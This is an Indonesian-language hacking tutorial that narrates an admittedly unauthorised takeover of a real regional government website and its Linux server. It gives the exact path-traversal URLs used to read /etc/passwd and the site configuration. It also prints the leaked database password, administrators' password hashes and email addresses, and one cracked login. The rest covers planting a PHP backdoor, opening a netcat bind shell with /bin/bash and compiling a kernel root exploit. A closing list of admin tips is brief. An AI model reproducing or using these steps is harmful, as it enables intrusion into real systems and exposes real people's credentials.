Anda di halaman 1dari 11

>> Palopo Open Source communiTy (P-O-S-T)<< :: Proof of Concept :: >> From Nothing to Rooting <<

Penulis Kontak : 3xtr3m3b0y : 3xtr3m3b0y@gmail.com

:: Basa Basi... Tutorial ini dibuat semata-mata didasari oleh keingintahuan belaka dan tidak dengan tujuan untuk melakukan pengrusakan yang mengakibatkan orang lain mengalami kerugian, berpikirlah positif karena dengan demikian alam juga akan merespon positif terhadap Anda, karena segala hal pasti ada sisi positif dan negatifnya... :: Target Pembaca Tulisan ini dibuat oleh pemula dan untuk pemula, bagi Anda yang merasa telah berada tahap di atas pemula tidak disarankan bagi Anda untuk membaca tulisan ini... :: Topik Mengambil alih akses root mesin Linux dengan memanfaatkan kelemahan Kernel, melalui pengambil alihan sebuah website... :: Info Target http://www.tanggamus.go.id

################################################################## $ ping www.tanggamus.go.id PING www.tanggamus.go.id (61.8.78.210) 56(84) bytes of data.

$ whois 61.8.78.210 % [whois.apnic.net node-1] % Whois data copyright terms

http://www.apnic.net/db/dbcopyright.html

inetnum : 61.8.78.208 - 61.8.78.211 netname : LA-MI descr : PEMDA KAB. TANGGAMUS LAMPUNG descr : KOTA AGUNG country : ID admin-c : LA60-AP tech-c : LA60-AP mnt-by : MAINT-LINTASARTA ################################################################## Website dibuat menggunakan Joomla CMS :: Alat & Bahan [>>] [>>] [>>] [>>] [>>] [>>] [>>] [>>] [>>] [>>] Laptop / PC Disarankan menggunakan OS berlisensi or Opensource Koneksi Internet makin gede Bandwidthnya makin Asyik... Browser Suka-suka ente, tapi direkomendasikan menggunakan Firefox http://www.google.com Buat nanya2 segala hal http://www.milw0rm.com Buat nyari info Vulner dan Exploit Web Proxy agar IP asli kita tidak kelihatan, http://samair.ru Proxy List Favorit Backdoor PHP r57 / c99 untuk explore direktori via web Bind Connect Netcat untuk koneksi ke mesin via console Linux kernel 2.6.17-2.6.24 Root Exploit http://www.milw0rm.com/exploits/5092 Segelas Susu Cap Nona manis Hmmm, nambah donk...

:: Proof of Concept Dari hasil pengamatan terdapat 1 component pada website yang memiliki kelemahan Arbitrary File Download Vulnerability yaitu com_ionFiles ver. 4.4.2, yang digunakan untuk fasilitas Download.

Anda dapat melihat info lengkap tentang kelemahan dan exploitnya di : http://www.milw0rm.com/exploits/6809 dan berikut isi dari halaman tersebut : ======================================================================================= Arbitrary File Download Vulnerability ======================================================================================= Software : ionFiles 4.4.2 Component for Joomla! CMS Vendor : http://forum.codecall.net/ Date : 23 October 2008 Author : Vrs-hCk Contact : d00r[at]telkom[dot]net ======================================================================================= [] Google Dork inurl:com_ionfiles [] Vulnerable ./download.php Line 32: $file = $_GET['file']; Line 33: $download = $_GET['download']; Line 66 - 91 [] Exploit http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1 [] Proof of Concept http://esecutech.com/components/com_ionfiles/download.php? file=../../configuration.php&download=1 http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../ etc/passwd&download=1 # milw0rm.com [2008-10-22] ======================================================================================= dari hal tersebut di atas, kita dapat mengambil file-file penting yang ada pada mesin target, misal yang paling sensitif adalah file /etc/passwd yang berisi daftar user pada sistem Linuxnya. Langsung saja kita coba pada website target dengan cara sebagai berikut : http://www.tanggamus.go.id/components/com_ionfiles/download.php? file=../../../../../../../../etc/passwd&download=1 Selanjutnya kita akan diminta untuk menyimpan file tersebut, simpanlah dan buka filenya kemudian Anda akan melihat daftar user-user yang terdapat pada sistem Linuxnya. Hmm, tapi target utama kita kali ini adalah file konfigurasi dari Joomla Websitenya, untuk itu silahkan masukkan alamat ini : http://www.tanggamus.go.id/components/com_ionfiles/download.php? file=../../configuration.php&download=1

Anda akan kembali diminta menyimpan filenya, lalu buka dan akan terlihat baris-baris konfigurasi penting dari Joomla Websitenya, berikut baris-baris yang kita butuhkan : ======================================================================================= $mosConfig_absolute_path = '/var/www/tanggamus'; //Lokasi file-file Website $mosConfig_db = 'tanggamus_db' //Nama Database Website $mosConfig_host = 'localhost'; //Nama Host Database $mosConfig_user = 'tanggamus'; //User Database untuk koneksi ke MySQL $mosConfig_password = 'dbtanggamus'; //Password Database untuk koneksi ke MySQL $mosConfig_mailfrom = 'hery@elektro.unila.ac.id'; //Alamat email Admin Buat Ngelapor =======================================================================================

Selanjutnya kita mencoba terkoneksi ke database, kita coba apakah pada Websitenya disediakan phpmyadmin moga saja ada yach...! Untuk itu kita coba memasukkan alamat ini : http://www.tanggamus.go.id/phpmyadmin Voilaaa...! kita beruntung kali ini, sang Admin dengan senang hati menyediakannya untuk Anda :D, mari kita lanjutkan aksi berikutnya dengan memanfaatkan info User dan Password yang sudah kita dapatkan untuk Login ke database.

Setelah berhasil masuk ke database, buka tabel jos_users untuk melihat daftar User yang diberikan hak untuk mengakses Administrator Website, kita hanya mengambil User yang bertindak sebagai Super Administrator, berikut daftarnya :

======================================================================================= User Password Email ======================================================================================= herieds c4ca4238a0b923820dcc509a6f75849b hery@elektro.unila.ac.id johan 94567006c4b65ccbe495410d95ffff32 johan@unila.ac.id ======================================================================================= Hmm, password dienkripsi dengan MD5 Hash, apa yang harus kita lakukan selanjutnya...??? Sebenarnya ada 2 skenario yang bisa lakukan, yaitu : 1. 2. Mendekripsi password sehingga kita bisa mengetahui password aslinya, tapi blum pasti kita bisa mendekripnya, ini tergantung dari kuat atau lemahnya password yang dbuat sebelumnya. Mengganti kode enkripsi dengan password yang sudah kita ketahui kode enkripsinya.

Untuk awal kita coba saja melakukan dekripsi pada kode password yang ada, moga saja bisa...!!! http://gdataonline.com/seekhash.php << Situs deksripsi MD5 Hash Favorit saya...

Asyik...! kita beruntung kali ini, ada satu Hash yang bisa didekripsi : Hash: c4ca4238a0b923820dcc509a6f75849b >> 1 Jadi nanti kita login ke administrator Website dengan menggunakan : User: herieds, Password: 1

http://www.tanggamus.go.id/administrator

Setelah berhasil Login, cek apakah terdapat component yang bisa kita gunakan untuk mengupload file, component yang biasa digunakan adalah com_joomlaexplorer, jika tidak ada instalkan dengan terlebih dahulu mendownload component yang bersangkutan.

Kita lagi-lagi sangat beruntung karena Admin benar-benar tahu apa kebutuhan kita :D ternyata component tersebut telah disediakan, jadi kita tidak perlu susah payah menginstalkannya. Langsung saja menuju ke Menu Component dan pilih Joomla Explorer, selanjutnya akan ditampilkan daftar Navigasi Direktori Websitenya, pilihlah lokasi yang diberi akses Write sehingga

kita dapat memasukkan file Backdoor PHP dengan bebas ke dalamnya, dan jangan lupa tempatkan pada lokasi yang tidak mudah ditemukan. Ternyata lagi-lagi sang Admin sangat teledor, semua direktori disetting bisa menulis untuk semua jenis User :D, dengan demikian kita bisa dengan bebas menempatkan file Backdoor PHP dimanapun. Saya kemudian meletakkan file Backdoor di http://www.tanggamus.go.id/includes/class.php

Setelah mengakses Backdoor kita dapat melihat info versi Linux Kernelnya, yang nantinya menjadi awal buat kita mencari Exploit yg sesuai.

Hmmm, setelah mencari exploit linux kernel 2.6.22 di www.milw0rm.com ternyata ada, malah dapat root exploit di http://www.milw0rm.com/exploits/5092 Langkah selanjutnya mengcopy isi halamannya lalu paste di Text Editor dan simpan. Disini saya memberi nama agent.c kemudian mengcompile file exploit tersebut di local komputer kita : $ gcc agent.c -o agent

Jika berhasil akan terbentuk file baru bernama agent yang nantinya kita Upload bersama file Netcat agar bisa diakses via console. Agar tidak mencurigakan file Netcat saya rubah namanya menjadi metadata, jalankan file tersebut pada Backdoor dengan cara : ./metadata -v -l -p 31000 -e /bin/bash

Setelah itu buka console pada Komputer kita lalu ketik : $ nc www.tanggamus.go.id 31000

Selanjutnya tes pada console dengan mengetik beberapa perintah dasar Linux seperti ls, jika muncul daftar file dan direktori dari mesin target berarti kita berhasil terkoneksi.

Langkah berikutnya jalankan file Exploit yang telah kita upload sebelumnya. ./agent Tunggu beberapa saat, lalu cek status User kita dengan mengetikkan id tanpa tanda kutip di console dan Waooowww sungguh mencengangkan karena saat ini root si penguasa mesin sudah berada ditangan Anda >:)

Tips untuk Administrator : 1. 2. 3. 4. 5. 6. Jika harus menggunakan CMS usahakan cek terlebih dahulu apakah CMS tersebut aman, terutama pada komponen dan modulnya. Konfigurasi akses direktori dan file secara bijaksana, sebaiknya hanya pemilik direktori yang boleh diberikan akses Write. Jangan memasang secara semberono fasilitas akses database seperti phpmyadmin dan akses login ke administrasi Website, jika memang harus, usahakan lindungi agar tidak sembarang orang bisa mengaksesnya, misal dilindungi dengan file .htaccess. Pastikan Sistem Operasi pada mesin hosting aman dari segala exploit yang bisa mengambil alih hak akses ROOT, usahakan secara rajin mengikuti perkembangan di website-website yang mengabarkan kelemahan-kelemahan suatu sistem. Administrator harus orang yang tekun dan sabar dalam mengupgrade ilmu yang dimilikinya. Gaji Administrator harus mencukupi bagi hidupnya agar kerjanya juga semangat... :D

Mohon maaf jika banyak kekurangan disana sini, ini disebabkan oleh minimnya ilmu dari sipenulis, moga bermanfaat bagi siapa saja. Mohon maaf yang sedalam-dalamnya kepada pemilik situs karena tanpa izin melakukan percobaan ini. Tidak ada kerusakan yang diakibatkan pada website dan sistem mesin Linuxnya ketika percobaan dilakukan dan penentuan target adalah faktor kebetulan saja, dan sejak awal penulis sama sekali tidak ada niat untuk melakukan pengrusakan.

>> Selamat Mencoba <<

Anda mungkin juga menyukai